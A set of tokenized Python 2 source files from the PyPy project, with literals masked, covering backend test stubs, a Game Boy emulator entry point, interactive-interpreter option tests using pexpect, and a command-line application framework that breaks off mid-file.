<s> import py <EOL> from pypy . translator . cli . test . runtest import CliTest <EOL> from pypy . rlib . test . test_streamio import BaseTestBufferingInputStreamTests , BaseTestBufferingOutputStream , BaseTestLineBufferingOutputStream , BaseTestCRLFFilter , BaseTestBufferingInputOutputStreamTests , BaseTestTextInputFilter , BaseTestTextOutputFilter <EOL> class TestBufferingInputStreamTests ( CliTest , BaseTestBufferingInputStreamTests ) : <EOL> pass <EOL> class TestBufferingOutputStream ( CliTest , BaseTestBufferingOutputStream ) : <EOL> pass <EOL> class TestLineBufferingOutputStream ( CliTest , BaseTestLineBufferingOutputStream ) : <EOL> pass <EOL> class TestCRLFFilter ( CliTest , BaseTestCRLFFilter ) : <EOL> pass <EOL> class TestBufferingInputOutputStreamTests ( CliTest , BaseTestBufferingInputOutputStreamTests ) : <EOL> pass <EOL> class TestTextInputFilter ( CliTest , BaseTestTextInputFilter ) : <EOL> pass <EOL> class TestTextOutputFilter ( CliTest , BaseTestTextOutputFilter ) : <EOL> pass </s>
<s> import os <EOL> import py <EOL> from pypy . lang . gameboy import constants <EOL> from pypy . lang . gameboy . gameboy import GameBoy <EOL> ROM_PATH = str ( py . magic . autopath ( ) . dirpath ( ) . dirpath ( ) . dirpath ( ) ) + "<STR_LIT>" <EOL> EMULATION_CYCLES = <NUM_LIT:1> << <NUM_LIT> <EOL> def entry_point ( argv = None ) : <EOL> if len ( argv ) > <NUM_LIT:1> : <EOL> filename = argv [ <NUM_LIT:1> ] <EOL> else : <EOL> filename = ROM_PATH + "<STR_LIT>" <EOL> gameBoy = GameBoy ( ) <EOL> gameBoy . load_cartridge_file ( str ( filename ) ) <EOL> gameBoy . emulate ( EMULATION_CYCLES ) <EOL> return <NUM_LIT:0> <EOL> def target ( * args ) : <EOL> return entry_point , None <EOL> def test_target ( ) : <EOL> entry_point ( [ "<STR_LIT>" , ROM_PATH + "<STR_LIT>" ] ) </s>
<s> """<STR_LIT>""" <EOL> import py <EOL> import sys , os , re <EOL> import autopath <EOL> from pypy . tool . udir import udir <EOL> banner = sys . version . splitlines ( ) [ <NUM_LIT:0> ] <EOL> def relpath ( path ) : <EOL> curdir = py . path . local ( ) <EOL> p = py . path . local ( path ) <EOL> result = [ ] <EOL> while not p . relto ( curdir ) : <EOL> result . append ( os . pardir ) <EOL> if curdir == curdir . dirpath ( ) : <EOL> return str ( path ) <EOL> curdir = curdir . dirpath ( ) <EOL> result . append ( p . relto ( curdir ) ) <EOL> return os . path . join ( * result ) <EOL> app_main = os . path . join ( autopath . this_dir , os . pardir , '<STR_LIT>' ) <EOL> app_main = os . path . abspath ( app_main ) <EOL> _counter = <NUM_LIT:0> <EOL> def getscript ( source ) : <EOL> global _counter <EOL> p = udir . join ( '<STR_LIT>' % ( _counter , ) ) <EOL> _counter += <NUM_LIT:1> <EOL> p . write ( str ( py . code . Source ( source ) ) ) <EOL> return relpath ( p ) <EOL> demo_script = getscript ( """<STR_LIT>""" ) <EOL> crashing_demo_script = getscript ( """<STR_LIT>""" ) <EOL> class TestInteraction : <EOL> """<STR_LIT>""" <EOL> def _spawn ( self , * args , ** kwds ) : <EOL> try : <EOL> import pexpect <EOL> except ImportError , e : <EOL> py . test . skip ( str ( e ) ) <EOL> else : <EOL> version = map ( int , pexpect . __version__ . split ( '<STR_LIT:.>' ) ) <EOL> if version < [ <NUM_LIT:2> , <NUM_LIT:1> ] : <EOL> py . test . skip ( <EOL> "<STR_LIT>" % ( <EOL> pexpect . __version__ , ) ) <EOL> kwds . setdefault ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> print '<STR_LIT>' , args , kwds <EOL> child = pexpect . spawn ( * args , ** kwds ) <EOL> child . logfile = sys . stdout <EOL> return child <EOL> def spawn ( self , argv ) : <EOL> return self . _spawn ( sys . executable , [ app_main ] + argv ) <EOL> def test_interactive ( self ) : <EOL> child = self . spawn ( [ ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( '<STR_LIT>' ) ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( '<STR_LIT>' ) ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( '<STR_LIT>' ) ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( "<STR_LIT>" ) <EOL> def test_run_script ( self ) : <EOL> child = self . spawn ( [ demo_script ] ) <EOL> idx = child . expect ( [ '<STR_LIT:hello>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . expect ( re . escape ( "<STR_LIT>" ) ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + demo_script ) ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + app_main ) ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + repr ( [ demo_script ] ) ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_run_script_with_args ( self ) : <EOL> argv = [ demo_script , '<STR_LIT:hello>' , '<STR_LIT>' ] <EOL> child = self . spawn ( argv ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + repr ( argv ) ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_no_such_script ( self ) : <EOL> import errno <EOL> msg = os . strerror ( errno . ENOENT ) <EOL> child = self . spawn ( [ '<STR_LIT>' ] ) <EOL> child . expect ( re . escape ( msg ) ) <EOL> def test_option_i ( self ) : <EOL> argv = [ demo_script , '<STR_LIT:foo>' , '<STR_LIT:bar>' ] <EOL> child = self . spawn ( [ '<STR_LIT>' ] + argv ) <EOL> idx = child . expect ( [ '<STR_LIT:hello>' , re . escape ( banner ) ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . expect ( re . escape ( '<STR_LIT>' + demo_script ) ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + repr ( argv ) ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> idx = child . expect ( [ '<STR_LIT>' , re . escape ( banner ) ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT:__main__>' ) <EOL> def test_option_i_crashing ( self ) : <EOL> argv = [ crashing_demo_script , '<STR_LIT:foo>' , '<STR_LIT:bar>' ] <EOL> child = self . spawn ( [ '<STR_LIT>' ] + argv ) <EOL> idx = child . expect ( [ '<STR_LIT>' , re . escape ( banner ) ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( repr ( argv ) ) ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( repr ( '<STR_LIT>' ) ) ) <EOL> def test_options_i_c ( self ) : <EOL> child = self . spawn ( [ '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' ] ) <EOL> idx = child . expect ( [ '<STR_LIT>' , re . escape ( banner ) ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . sendline ( '<STR_LIT:x>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT:__main__>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( "<STR_LIT>" ) ) <EOL> def test_options_i_c_crashing ( self ) : <EOL> child = self . spawn ( [ '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> idx = child . expect ( [ '<STR_LIT>' , re . escape ( banner ) ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . sendline ( '<STR_LIT:x>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT:__main__>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( "<STR_LIT>" ) ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( repr ( '<STR_LIT>' ) ) ) <EOL> def test_atexit ( self ) : <EOL> child = self . spawn ( [ ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> old = sys . stdin <EOL> try : <EOL> sys . stdin = child <EOL> child . sendeof ( ) <EOL> finally : <EOL> sys . stdin = old <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_pythonstartup ( self ) : <EOL> old = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> os . environ [ '<STR_LIT>' ] = crashing_demo_script <EOL> child = self . spawn ( [ ] ) <EOL> child . expect ( re . escape ( banner ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( '<STR_LIT>' ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child = self . spawn ( [ '<STR_LIT>' , demo_script ] ) <EOL> for line in [ '<STR_LIT:hello>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> idx = child . expect ( [ line , '<STR_LIT>' ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> finally : <EOL> os . environ [ '<STR_LIT>' ] = old <EOL> def test_unbuffered ( self ) : <EOL> line = '<STR_LIT>' <EOL> child = self . spawn ( [ '<STR_LIT>' , '<STR_LIT:-c>' , line ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT:X>' ) <EOL> def test_options_i_m ( self ) : <EOL> if sys . platform == "<STR_LIT:win32>" : <EOL> skip ( "<STR_LIT>" ) <EOL> p = os . path . join ( autopath . this_dir , '<STR_LIT>' ) <EOL> p = os . path . abspath ( p ) <EOL> child = self . spawn ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + p ) ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + repr ( [ p , '<STR_LIT>' ] ) ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT:True>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT:False>' ) <EOL> def test_options_u_i ( self ) : <EOL> if sys . platform == "<STR_LIT:win32>" : <EOL> skip ( "<STR_LIT>" ) <EOL> import subprocess , select , os <EOL> python = sys . executable <EOL> pipe = subprocess . Popen ( [ python , app_main , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> stdout = subprocess . PIPE , <EOL> stdin = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT , <EOL> bufsize = <NUM_LIT:0> , close_fds = True ) <EOL> iwtd , owtd , ewtd = select . select ( [ pipe . stdout ] , [ ] , [ ] , <NUM_LIT:5> ) <EOL> assert iwtd <EOL> data = os . read ( pipe . stdout . fileno ( ) , <NUM_LIT> ) <EOL> assert data . startswith ( '<STR_LIT>' ) <EOL> def test_paste_several_lines_doesnt_mess_prompt ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> child = self . spawn ( [ ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_pythoninspect ( self ) : <EOL> old = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:1>' <EOL> path = getscript ( """<STR_LIT>""" ) <EOL> child = self . spawn ( [ path ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> finally : <EOL> os . environ [ '<STR_LIT>' ] = old <EOL> def test_set_pythoninspect ( self ) : <EOL> path = getscript ( """<STR_LIT>""" ) <EOL> child = self . spawn ( [ path ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_clear_pythoninspect ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> old = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> path = getscript ( """<STR_LIT>""" ) <EOL> child = self . spawn ( [ path ] ) <EOL> xxx <EOL> finally : <EOL> os . environ [ '<STR_LIT>' ] = old <EOL> def test_stdout_flushes_before_stdin_blocks ( self ) : <EOL> path = getscript ( """<STR_LIT>""" ) <EOL> py_py = os . path . join ( autopath . pypydir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> child = self . _spawn ( sys . executable , [ py_py , path ] ) <EOL> child . expect ( '<STR_LIT>' , timeout = <NUM_LIT> ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_no_space_before_argument ( self ) : <EOL> child = self . spawn ( [ '<STR_LIT>' ] ) <EOL> child . expect ( '<STR_LIT:hello>' ) <EOL> child = self . spawn ( [ '<STR_LIT>' ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> class TestNonInteractive : <EOL> def run ( self , cmdline , senddata = '<STR_LIT>' , expect_prompt = False , <EOL> expect_banner = False ) : <EOL> cmdline = '<STR_LIT>' % ( sys . executable , app_main , cmdline ) <EOL> print '<STR_LIT>' , cmdline <EOL> child_in , child_out_err = os . popen4 ( cmdline ) <EOL> child_in . write ( senddata ) <EOL> child_in . close ( ) <EOL> data = child_out_err . read ( ) <EOL> child_out_err . close ( ) <EOL> assert ( banner in data ) == expect_banner <EOL> assert ( '<STR_LIT>' in data ) == expect_prompt <EOL> return data <EOL> def test_script_on_stdin ( self ) : <EOL> for extraargs , expected_argv in [ <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT:->' , [ '<STR_LIT:->' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT:->' , '<STR_LIT:hello>' , '<STR_LIT>' ] ) , <EOL> ] : <EOL> data = self . run ( '<STR_LIT>' % ( extraargs , demo_script ) ) <EOL> assert "<STR_LIT:hello>" in data <EOL> assert "<STR_LIT>" in data <EOL> assert "<STR_LIT>" in data <EOL> assert ( "<STR_LIT>" + app_main ) in data <EOL> assert ( "<STR_LIT>" + repr ( expected_argv ) ) in data <EOL> assert "<STR_LIT>" in data <EOL> def test_run_crashing_script ( self ) : <EOL> data = self . run ( '<STR_LIT>' % ( crashing_demo_script , ) ) <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' not in data <EOL> def test_crashing_script_on_stdin ( self ) : <EOL> data = self . run ( '<STR_LIT>' % ( crashing_demo_script , ) ) <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' not in data <EOL> def test_option_W ( self ) : <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in data <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in data <EOL> def test_option_W_crashing ( self ) : <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in data <EOL> def test_option_W_arg_ignored ( self ) : <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert "<STR_LIT>" in data <EOL> def test_option_W_arg_ignored2 ( self ) : <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert "<STR_LIT>" in data <EOL> def test_option_c ( self ) : <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in data <EOL> def test_no_pythonstartup ( self ) : <EOL> old = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> os . environ [ '<STR_LIT>' ] = crashing_demo_script <EOL> data = self . run ( '<STR_LIT>' % ( demo_script , ) ) <EOL> assert '<STR_LIT>' not in data <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in data <EOL> finally : <EOL> os . environ [ '<STR_LIT>' ] = old <EOL> def test_option_m ( self ) : <EOL> p = os . path . join ( autopath . this_dir , '<STR_LIT>' ) <EOL> p = os . path . abspath ( p ) <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' in data <EOL> assert ( '<STR_LIT>' + p ) in data <EOL> assert ( '<STR_LIT>' + repr ( [ p , '<STR_LIT>' ] ) ) in data <EOL> def test_pythoninspect_doesnt_override_isatty ( self ) : <EOL> old = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:1>' <EOL> data = self . run ( '<STR_LIT>' , senddata = '<STR_LIT>' ) <EOL> assert data == '<STR_LIT>' <EOL> finally : <EOL> os . environ [ '<STR_LIT>' ] = old <EOL> def test_i_flag_overrides_isatty ( self ) : <EOL> data = self . run ( '<STR_LIT>' , senddata = '<STR_LIT>' , <EOL> expect_prompt = True , expect_banner = True ) <EOL> assert '<STR_LIT>' in data <EOL> cmdline = '<STR_LIT>' % getscript ( """<STR_LIT>""" ) <EOL> data = self . run ( cmdline , senddata = '<STR_LIT>' , <EOL> expect_prompt = True , expect_banner = False ) <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' in data <EOL> def test_non_interactive_stdout_fully_buffered ( self ) : <EOL> path = getscript ( r"""<STR_LIT>""" ) <EOL> cmdline = '<STR_LIT>' % ( sys . executable , app_main , path ) <EOL> print '<STR_LIT>' , cmdline <EOL> child_in , child_out_err = os . popen4 ( cmdline ) <EOL> data = child_out_err . read ( <NUM_LIT:11> ) <EOL> assert data == '<STR_LIT>' <EOL> child_in . close ( ) <EOL> data = child_out_err . read ( <NUM_LIT:11> ) <EOL> assert data == '<STR_LIT>' <EOL> child_out_err . close ( ) </s>
<s> import py <EOL> from pypy . translator . oosupport . test_template . constant import BaseTestConstant <EOL> from pypy . translator . jvm . test . runtest import JvmTest <EOL> class TestConstant ( BaseTestConstant , JvmTest ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT:1.0>' <EOL> import sys , getopt , string , glob , os , traceback , re <EOL> def _getopt_flags ( options ) : <EOL> """<STR_LIT>""" <EOL> s = [ ] <EOL> l = [ ] <EOL> for o in options : <EOL> if o . prefix == '<STR_LIT:->' : <EOL> s . append ( o . name ) <EOL> if o . takes_argument : <EOL> s . append ( '<STR_LIT::>' ) <EOL> else : <EOL> if o . takes_argument : <EOL> l . append ( o . name + '<STR_LIT:=>' ) <EOL> else : <EOL> l . append ( o . name ) <EOL> return string . join ( s , '<STR_LIT>' ) , l <EOL> def invisible_input ( prompt = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> import getpass <EOL> entry = getpass . getpass ( prompt ) <EOL> if entry is None : <EOL> raise KeyboardInterrupt <EOL> return entry <EOL> def option_dict ( options ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> for option in options : <EOL> d [ option . name ] = option <EOL> return d <EOL> getpasswd = invisible_input <EOL> _integerRE = re . compile ( '<STR_LIT>' ) <EOL> _integerRangeRE = re . compile ( '<STR_LIT>' ) <EOL> def srange ( s , <EOL> split = string . split , integer = _integerRE , <EOL> integerRange = _integerRangeRE ) : <EOL> """<STR_LIT>""" <EOL> l = [ ] <EOL> append = l . append <EOL> for entry in split ( s , '<STR_LIT:U+002C>' ) : <EOL> m = integer . match ( entry ) <EOL> if m : <EOL> append ( int ( m . groups ( ) [ <NUM_LIT:0> ] ) ) <EOL> continue <EOL> m = integerRange . match ( entry ) <EOL> if m : <EOL> start , end = map ( int , m . groups ( ) ) <EOL> l [ len ( l ) : ] = range ( start , end + <NUM_LIT:1> ) <EOL> return l <EOL> class Option : <EOL> """<STR_LIT>""" <EOL> default = None <EOL> helptext = '<STR_LIT>' <EOL> prefix = '<STR_LIT:->' <EOL> takes_argument = <NUM_LIT:0> <EOL> has_default = <NUM_LIT:0> <EOL> tab = <NUM_LIT:15> <EOL> def __init__ ( self , name , help = None ) : <EOL> if not name [ : <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if name [ <NUM_LIT:1> : <NUM_LIT:2> ] == '<STR_LIT:->' : <EOL> self . prefix = '<STR_LIT>' <EOL> self . name = name [ <NUM_LIT:2> : ] <EOL> else : <EOL> self . name = name [ <NUM_LIT:1> : ] <EOL> if help : <EOL> self . help = help <EOL> def __str__ ( self ) : <EOL> o = self <EOL> name = o . prefix + o . name <EOL> if o . takes_argument : <EOL> name = name + '<STR_LIT>' <EOL> if len ( name ) > self . tab : <EOL> name = name + '<STR_LIT:\n>' + '<STR_LIT:U+0020>' * ( self . tab + <NUM_LIT:1> + len ( o . prefix ) ) <EOL> else : <EOL> name = '<STR_LIT>' % ( self . tab , name ) <EOL> description = o . help <EOL> if o . has_default : <EOL> description = description + '<STR_LIT>' % o . default <EOL> return '<STR_LIT>' % ( name , description ) <EOL> class ArgumentOption ( Option ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , help = None , default = None ) : <EOL> Option . __init__ ( self , name , help ) <EOL> if default is not None : <EOL> self . default = default <EOL> self . has_default = <NUM_LIT:1> <EOL> self . takes_argument = <NUM_LIT:1> <EOL> class SwitchOption ( Option ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , help = None , default = None ) : <EOL> Option . __init__ ( self , name , help ) <EOL> if default is not None : <EOL> self . default = default <EOL> self . has_default = <NUM_LIT:1> <EOL> class Application : <EOL> """<STR_LIT>""" <EOL> options = [ ] <EOL> preset_options = [ SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> header = '<STR_LIT>' <EOL> name = '<STR_LIT>' <EOL> synopsis = '<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> about = '<STR_LIT>' <EOL> examples = '<STR_LIT>' <EOL> copyright = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> globbing = <NUM_LIT:1> <EOL> debug = <NUM_LIT:0> <EOL> verbose = <NUM_LIT:0> <EOL> values = None <EOL> files = None <EOL> def __init__ ( self , argv = None ) : <EOL> if argv is None : <EOL> argv = sys . argv <EOL> self . filename = os . path . split ( argv [ <NUM_LIT:0> ] ) [ <NUM_LIT:1> ] <EOL> if not self . name : <EOL> self . name = os . path . split ( self . filename ) [ <NUM_LIT:1> ] <EOL> else : <EOL> self . name = self . name <EOL> if not self . header : <EOL> self . header = self . name <EOL> else : <EOL> self . header = self . header <EOL> self . arguments = argv [ <NUM_LIT:1> : ] <EOL> self . option_map = option_dict ( self . options ) <EOL> for option in self . preset_options : <EOL> if not self . option_map . has_key ( option . name ) : <EOL> self . add_option ( option ) <EOL> self . files = [ ] <EOL> try : <EOL> rc = self . startup ( ) <EOL> if rc is not None : <EOL> raise SystemExit ( rc ) <EOL> rc = self . parse ( ) <EOL> if rc is not None : <EOL> raise SystemExit ( rc ) <EOL> rc = self . main ( ) <EOL> if rc is None : <EOL> rc = <NUM_LIT:0> <EOL> except SystemExit , rc : <EOL> pass <EOL> except KeyboardInterrupt : <EOL> print <EOL> print '<STR_LIT>' <EOL> rc = <NUM_LIT:1> <EOL> except : <EOL> print <EOL> print '<STR_LIT>' <EOL> if self . debug : <EOL> print <EOL> traceback . print_exc ( <NUM_LIT:20> ) <EOL> rc = <NUM_LIT:1> <EOL> raise SystemExit ( rc ) <EOL> def add_option ( self , option ) : <EOL> """<STR_LIT>""" <EOL> self . options . append ( option ) <EOL> self . option_map [ option . name ] = option <EOL> def startup ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def exit ( self , rc = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> raise SystemExit ( rc ) <EOL> def parse ( self ) : <EOL> """<STR_LIT>""" <EOL> self . values = values = { } <EOL> for o in self . options : <EOL> if o . has_default : <EOL> values [ o . prefix + o . name ] = o . default <EOL> else : <EOL> values [ o . prefix + o . name ] = <NUM_LIT:0> <EOL> flags , lflags = _getopt_flags ( self . options ) <EOL> try : <EOL> optlist , files = getopt . getopt ( self . arguments , flags , lflags ) <EOL> if self . globbing : <EOL> l = [ ] <EOL> for f in files : <EOL> gf = glob . glob ( f ) <EOL> if not gf : <EOL> l . append ( f ) <EOL> else : <EOL> l [ len ( l ) : ] = gf <EOL> files = l <EOL> self . optionlist = optlist <EOL> self . files = files + self . files <EOL> except getopt . error , why : <EOL> self . help ( why ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> rc = self . handle_files ( self . files ) <EOL> if rc is not None : <EOL> sys . exit ( rc ) <EOL> for optionname , value in optlist : <EOL> try : <EOL> value = string . atoi ( value ) <EOL> except ValueError : <EOL> pass <EOL> handlername = '<STR_LIT>' + string . replace ( optionname , '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> try : <EOL> handler = getattr ( self , handlername ) <EOL> except AttributeError : <EOL> if value == '<STR_LIT>' : <EOL> if values . has_key ( optionname ) : <EOL> values [ optionname ] = values [ optionname ] + <NUM_LIT:1> <EOL> else : <EOL> values [ optionname ] = <NUM_LIT:1> <EOL> else : <EOL> values [ optionname ] = value <EOL> else : <EOL> rc = handler ( value ) <EOL> if rc is not None : <EOL> raise SystemExit ( rc ) <EOL> rc = self . check_files ( self . files ) <EOL> if rc is not None : <EOL> sys . exit ( rc ) <EOL> def check_files ( self , filelist ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def help ( self , note = '<STR_LIT>' ) : <EOL> self . print_header ( ) <EOL> if self . synopsis : <EOL> print '<STR_LIT>' <EOL> try : <EOL> synopsis = self . synopsis % self . name <EOL> except ( NameError , KeyError , TypeError ) : <EOL> synopsis = self . synopsis % self . __dict__ <EOL> print '<STR_LIT:U+0020>' + synopsis <EOL> print <EOL> self . print_options ( ) <EOL> if self . version : <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % self . version <EOL> print <EOL> if self . about : <EOL> print string . strip ( self . about % self . __dict__ ) <EOL> print <EOL> if note : <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print '<STR_LIT>' , note <EOL> print <EOL> def notice ( self , note ) : <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print '<STR_LIT>' , note <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print <EOL> def print_header ( self ) : <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print self . header % self . __dict__ <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print <EOL> def print_options ( self ) : <EOL> options = self . options <EOL> print '<STR_LIT>' <EOL> if not options : <EOL> print '<STR_LIT>' <EOL> return <EOL> long = filter ( lambda x : x . prefix == '<STR_LIT>' , options ) <EOL> short = filter ( lambda x : x . prefix == '<STR_LIT:->' , options ) <EOL> items = short + long <EOL> for o in options : <EOL> print '<STR_LIT:U+0020>' , o <EOL> print <EOL> def handle_files ( self , files ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def handle_h ( self , arg ) : <EOL> self . help ( ) <EOL> return <NUM_LIT:0> <EOL> def handle_v ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . verbose = <NUM_LIT:1> <EOL> def handle__help ( self , arg ) : <EOL> self . help ( ) <EOL> return <NUM_LIT:0> <EOL> def handle__debug ( self , arg ) : <EOL> self . debug = <NUM_LIT:1> <EOL> def handle__copyright ( self , arg ) : <EOL> self . print_header ( ) <EOL> print string . strip ( self . copyright % self . __dict__ ) <EOL> print <EOL> return <NUM_LIT:0> <EOL> def handle__examples ( self , arg ) : <EOL> self . print_header ( ) <EOL> if self . examples : <EOL> print '<STR_LIT>' <EOL> print <EOL> print string . strip ( self . examples % self . __dict__ ) <EOL> print <EOL> else : <EOL> print '<STR_LIT>' <EOL> print <EOL> return <NUM_LIT:0> <EOL> def main ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> CommandLine = Application <EOL> def _test ( ) : <EOL> class MyApplication ( Application ) : <EOL> header = '<STR_LIT>' <EOL> version = __version__ <EOL> options = [ Option ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> def handle_v ( self , arg ) : <EOL> print '<STR_LIT>' 